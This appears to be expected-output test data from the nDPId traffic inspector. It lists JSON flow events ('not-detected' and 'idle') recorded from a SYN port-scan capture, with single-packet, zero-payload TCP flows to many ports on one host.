-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060496,"flow_last_seen":1278275060496,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060496,"flow_last_seen":1278275060496,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7921,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060598,"flow_last_seen":1278275060598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060598,"flow_last_seen":1278275060598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7921,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3826,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3827,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3826,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3827,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 